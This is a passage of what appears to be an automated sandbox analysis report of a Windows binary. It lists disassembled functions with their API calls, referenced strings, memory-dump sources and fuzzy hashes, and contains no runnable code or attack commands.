GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A4915A,00000B00,?,?), ref: 00A49519
GetCurrentProcess.KERNEL32(00A4915A,00000000,?,00A4915A,00000B00,?,?), ref: 00A49521
DuplicateHandle.KERNEL32(00000000,?,00A4915A,00000B00,?,?), ref: 00A49524
CreateThread.KERNEL32(00000000,00000000,00A4954A,00000000,00000000,00000000), ref: 00A4953E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: c402a30f58a76c55381b13bdb0fdce1c357be06a208f8ba301d522f92db9b22f
Instruction ID: 70be66b387cdbf5f304305da2635807d08f2a4c66dcab11ea48e70c95842fe19
Opcode Fuzzy Hash: c402a30f58a76c55381b13bdb0fdce1c357be06a208f8ba301d522f92db9b22f
Instruction Fuzzy Hash: F301CDB6240304BFE750EFA5DC8DF6B7BACEB89711F104511FA05DB1A1DA709805CB20

Function 00A6A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00A6A28E, 00A6A5B2
Not an Object type, xrefs: 00A6A265

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 23d7b57ca736ca731dbb62182b74b85e225b24cb6fbd78c1fec4a702e736be82
Instruction ID: 04e7684c4be3f085645057fa6fcb0de7a0048421e2240695617e8c96b5387a91
Opcode Fuzzy Hash: 23d7b57ca736ca731dbb62182b74b85e225b24cb6fbd78c1fec4a702e736be82
Instruction Fuzzy Hash: 40C18EB1A0021A9FDF10DFA8C984AAEB7B5FF58310F148469E916BB280E770DD45CF91

Function 00A697FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A69851
VariantInit.OLEAUT32(?), ref: 00A69922
VariantInit.OLEAUT32(?), ref: 00A69A23
VariantClear.OLEAUT32(?), ref: 00A69A2D
VariantClear.OLEAUT32(?), ref: 00A69A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 00A698B2, 00A699E0, 00A69A98
Incorrect Object type in FOR..IN loop, xrefs: 00A69A06

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 2245fe6d3ac4837a845847dbe54b6b8de6f3f58f2cade6616b38a099902a886d
Instruction ID: 67bac002800114488b5a4e6ffc9886e76e3571b1be40458510d5c93bd9244a65
Opcode Fuzzy Hash: 2245fe6d3ac4837a845847dbe54b6b8de6f3f58f2cade6616b38a099902a886d
Instruction Fuzzy Hash: 44917A71A00219ABDF24CFA5C888FAFBBB8EF85710F10855EF515AB291D7709945CBA0

Function 00A773A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A77449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00A7745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A77477
_wcscat.LIBCMT ref: 00A774D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A774E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A77517

Strings

SysListView32, xrefs: 00A7741B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 573cba7f816f576603f4c20b9508909098571f697004d4801e2cc59b523c59d6
Instruction ID: d1236757de318fb1ebdab7f1d9de605a921ccc61be1b4309f1c7872be2040ca5
Opcode Fuzzy Hash: 573cba7f816f576603f4c20b9508909098571f697004d4801e2cc59b523c59d6
Instruction Fuzzy Hash: 7C41A271A04308AFEB21DFA4CC85FEE7BA8EF08350F10846AF949A7191D7719D95CB50

Function 00A6F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00A54148: CreateToolhelp32Snapshot.KERNEL32 ref: 00A5416D
Part of subcall function 00A54148: Process32FirstW.KERNEL32(00000000,?), ref: 00A5417B
Part of subcall function 00A54148: CloseHandle.KERNEL32(00000000), ref: 00A54245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A6F08D
GetLastError.KERNEL32 ref: 00A6F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A6F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A6F14C
GetLastError.KERNEL32(00000000), ref: 00A6F157
CloseHandle.KERNEL32(00000000), ref: 00A6F18C

Strings

SeDebugPrivilege, xrefs: 00A6F0AB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e63cf4c0408c0fd224e47df932c1270ad08e58b00c48f439832f3d56f90c79aa
Instruction ID: 56ef47753f996474097e0969be35cc6ee4d5f71f4ebb4d55c411906762d2b3db
Opcode Fuzzy Hash: e63cf4c0408c0fd224e47df932c1270ad08e58b00c48f439832f3d56f90c79aa
Instruction Fuzzy Hash: 5941ED312002019FDB21EF68DCA5F7EB7B1AF84714F048519FA469F2D2CB74A809CB85

Function 00A534DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00A5357C

Strings

warning, xrefs: 00A53565
question, xrefs: 00A53535
stop, xrefs: 00A5354D
blank, xrefs: 00A534FE
info, xrefs: 00A5351D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 98274c697039a9c2186ad1d0158f0ef59de98a943fde92ea10caf67bba3b89b1
Instruction ID: b315b6778923fbb82279826b91375b18c18dc04e269110cc7dd5500ffeda68e6
Opcode Fuzzy Hash: 98274c697039a9c2186ad1d0158f0ef59de98a943fde92ea10caf67bba3b89b1
Instruction Fuzzy Hash: 9511EB73648346BEAF005F54DC92DAA77ACFF463E1B60111AFE00561C2F7746F4446A0

Function 00A547E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A54802
LoadStringW.USER32(00000000), ref: 00A54809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A5481F
LoadStringW.USER32(00000000), ref: 00A54826
_wprintf.LIBCMT ref: 00A5484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A5486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A54847

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 6b8e5fc1c45e0523d042760cc7c8c4f71640964afbd80513571e5cee4b72bd67
Instruction ID: 4929728e76d08298d49c5639e4057eede23df0c93bf1b8a43b671afaa8609907
Opcode Fuzzy Hash: 6b8e5fc1c45e0523d042760cc7c8c4f71640964afbd80513571e5cee4b72bd67
Instruction Fuzzy Hash: 6B014FF29002087FE791EBE09D89EF6736CEB08301F4005A5BB49E2041EA749E898B75

Function 00A7DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

GetSystemMetrics.USER32(0000000F), ref: 00A7DB42
GetSystemMetrics.USER32(0000000F), ref: 00A7DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A7DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A7DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A7DDDC
ShowWindow.USER32(00000003,00000000), ref: 00A7DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00A7DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A7DE43

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: a1746ff4572f54850e4fd9caa9d34d491039e028c60f9d43c38788339bb84576
Instruction ID: 6f3db0864b06b0c0bee40f4f80bfd5dd08860b44d5a8f60fc18d0de3263fd4c0
Opcode Fuzzy Hash: a1746ff4572f54850e4fd9caa9d34d491039e028c60f9d43c38788339bb84576
Instruction Fuzzy Hash: 8CB18831600219EFDF15CF69C985BAE7BB1FF44701F18C069EC48AE295E775A990CBA0

Function 00A70371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7040D,?,?), ref: 00A71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7044E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 35d904dccf92fde925c1a9e5c987f887355e429442418c8eeb204d5b90b3b178
Instruction ID: f2fb0307f8e797ca969645b68abb47879bc58120e00eaf9dadcf027da9a9f465
Opcode Fuzzy Hash: 35d904dccf92fde925c1a9e5c987f887355e429442418c8eeb204d5b90b3b178
Instruction Fuzzy Hash: 80A14370204205DFCB11EF68C891F6EBBE5AF84314F14C91DF99A9B2A2DB71E945CB42

Function 009F2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A2C508,00000004,00000000,00000000,00000000), ref: 009F2E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A2C508,00000004,00000000,00000000,00000000,000000FF), ref: 009F2EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A2C508,00000004,00000000,00000000,00000000), ref: 00A2C55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A2C508,00000004,00000000,00000000,00000000), ref: 00A2C5C7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 51d97e0e068aeaee58f0b49eb18b64a58b4d54ce46b982acdafc0dc750a55fd8
Instruction ID: adf5fe2043eb6e8e7eb1d9ba7b29be1f735de5a32c4907e0f458790d113a6b90
Opcode Fuzzy Hash: 51d97e0e068aeaee58f0b49eb18b64a58b4d54ce46b982acdafc0dc750a55fd8
Instruction Fuzzy Hash: CD4128306086889AC7758B2CDC88B7F7B96BB95310F34882DE687465A1C775F885DB21

Function 00A57681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A57698

Part of subcall function 00A10FE6: std::exception::exception.LIBCMT ref: 00A1101C
Part of subcall function 00A10FE6: __CxxThrowException@8.LIBCMT ref: 00A11031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A576CF
EnterCriticalSection.KERNEL32(?), ref: 00A576EB
_memmove.LIBCMT ref: 00A57739
_memmove.LIBCMT ref: 00A57756
LeaveCriticalSection.KERNEL32(?), ref: 00A57765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A5777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A57799

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 14d7b7357c334e95df4be18ef0df74a727744dc3a92566ab60980896d668277a
Instruction ID: 1e1e866c6138209c74ab9b30535952d45ffdc047bb4cbbf57d2cac9f592c61bc
Opcode Fuzzy Hash: 14d7b7357c334e95df4be18ef0df74a727744dc3a92566ab60980896d668277a
Instruction Fuzzy Hash: 80319031904205EBCB50EFA4DD89EAEBBB8FF49310F1441A5FD04AB256D7709E55CBA0

Function 00A767F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A76810
GetDC.USER32(00000000), ref: 00A76818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A76823
ReleaseDC.USER32(00000000,00000000), ref: 00A7682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A7686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A7687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A7964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00A768B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A768D6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: a0de1a31b3a431e55479feafa3d4eaa2dc2cb169f5dd87343661c47c643b10e7
Instruction ID: a010a44bb98b93c4a7f0000a6d00aa274c0785624f43bdf4218d13bf53181cae
Opcode Fuzzy Hash: a0de1a31b3a431e55479feafa3d4eaa2dc2cb169f5dd87343661c47c643b10e7
Instruction Fuzzy Hash: B7318D721016107FEB108F50CC4AFAB3BADEF49761F048065FE089A291D7B59852CBB0

Function 00A4C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00A4C75D
_memcmp.LIBCMT ref: 00A4C77F
_memcmp.LIBCMT ref: 00A4C797
_memcmp.LIBCMT ref: 00A4C7AA
_memcmp.LIBCMT ref: 00A4C7C4
_memcmp.LIBCMT ref: 00A4C7D7
_memcmp.LIBCMT ref: 00A4C7EF
_memcmp.LIBCMT ref: 00A4C80A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e1855b4a101eb55f55e9186289c194394caa8ead65925e13ee8a5d30973229d5
Instruction ID: 683daa0d3f1a158396a0f941328c3b7379a6572c577c1d70a738b7aabbe73890
Opcode Fuzzy Hash: e1855b4a101eb55f55e9186289c194394caa8ead65925e13ee8a5d30973229d5
Instruction Fuzzy Hash: C421D7BBB022057BD64476118F82FAB376CAEA1BB4B044420FE0AA6242F711DE15C6A5

Function 00A5F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

Part of subcall function 00A0436A: _wcscpy.LIBCMT ref: 00A0438D

_wcstok.LIBCMT ref: 00A5F2D7
_wcscpy.LIBCMT ref: 00A5F366
_memset.LIBCMT ref: 00A5F399

Strings

X, xrefs: 00A5F3D6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 0738d163b1f3555bdc8e70da087480a5fd051938ee4c8ad34765762709204125
Instruction ID: 10a57277c52a73831d089683e2f31a2214c7decdf6598beaefed5e330e50a390
Opcode Fuzzy Hash: 0738d163b1f3555bdc8e70da087480a5fd051938ee4c8ad34765762709204125
Instruction Fuzzy Hash: E2C19C715043459FD714EF64D981AAFB7E4BF89350F00492DF9999B2A2EB30EC49CB82

Function 00A671EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A672EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A6730C
WSAGetLastError.WSOCK32(00000000), ref: 00A6731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00A673D5
inet_ntoa.WSOCK32(?), ref: 00A67392

Part of subcall function 00A4B4EA: _strlen.LIBCMT ref: 00A4B4F4
Part of subcall function 00A4B4EA: _memmove.LIBCMT ref: 00A4B516

_strlen.LIBCMT ref: 00A6742F
_memmove.LIBCMT ref: 00A67498

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: aef31cb13c1f35c934a4eaa256eb19579002e60e497806b994e9f4e54aa88f86
Instruction ID: 47099633d17ebf25c13f3d4c4f625201802c870b91d25a81a248d904a9a505a2
Opcode Fuzzy Hash: aef31cb13c1f35c934a4eaa256eb19579002e60e497806b994e9f4e54aa88f86
Instruction Fuzzy Hash: 3981CF71118204ABD310EB24DC9AFAFB7B8EF84718F144618FA569B2D2DB70ED45CB91

Function 009F1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87e6e9c511ae59571720b93792a63ea2c6d81aabc92c7623cd9d5fe53d1f9f5
Instruction ID: 5ed9167531400fd34145d51fb05918d345c47aee26bb5034bc0c4662cb5a7d64
Opcode Fuzzy Hash: e87e6e9c511ae59571720b93792a63ea2c6d81aabc92c7623cd9d5fe53d1f9f5
Instruction Fuzzy Hash: C3715C30900109EFCB04DF99CD89EBEBB79FF86354F248159FA15AA251C734AA51CBA0

Function 00A7B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01026058), ref: 00A7BA5D
IsWindowEnabled.USER32(01026058), ref: 00A7BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00A7BB4D
SendMessageW.USER32(01026058,000000B0,?,?), ref: 00A7BB84
IsDlgButtonChecked.USER32(?,?), ref: 00A7BBC1
GetWindowLongW.USER32(01026058,000000EC), ref: 00A7BBE3
